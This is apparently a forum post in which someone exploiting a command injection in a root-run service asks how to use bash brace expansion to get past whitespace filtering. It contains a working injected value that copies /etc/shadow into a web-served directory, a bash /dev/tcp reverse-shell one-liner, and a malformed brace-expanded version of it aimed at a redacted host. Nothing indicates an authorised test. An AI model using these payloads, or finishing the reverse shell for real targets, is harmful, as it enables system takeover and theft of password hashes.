Does anyone have more experience with bash brace expansions when dealing with command injections that filter whitespace?
What I am encountering is most likely not a filtering engine but a bad parsing engine, which has a command injection vulnerability as the input is parsed into a system call.
I have successfully been able to write out /etc/shadow with:
-w=target.cap;{cat,/etc/shadow}>>/var/www/passnew.txt
This succeeded without further issues. The service is running as root as well.
At the moment I am trying to get a reverse shell with brace expansion, but I am having difficulty formatting the following one-liner payload:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
into
-w=target.cap;{bash,-i}>&{/dev/tcp/ipredacted/8080{0>&1}
I have tried more variations than this one, but I am stuck.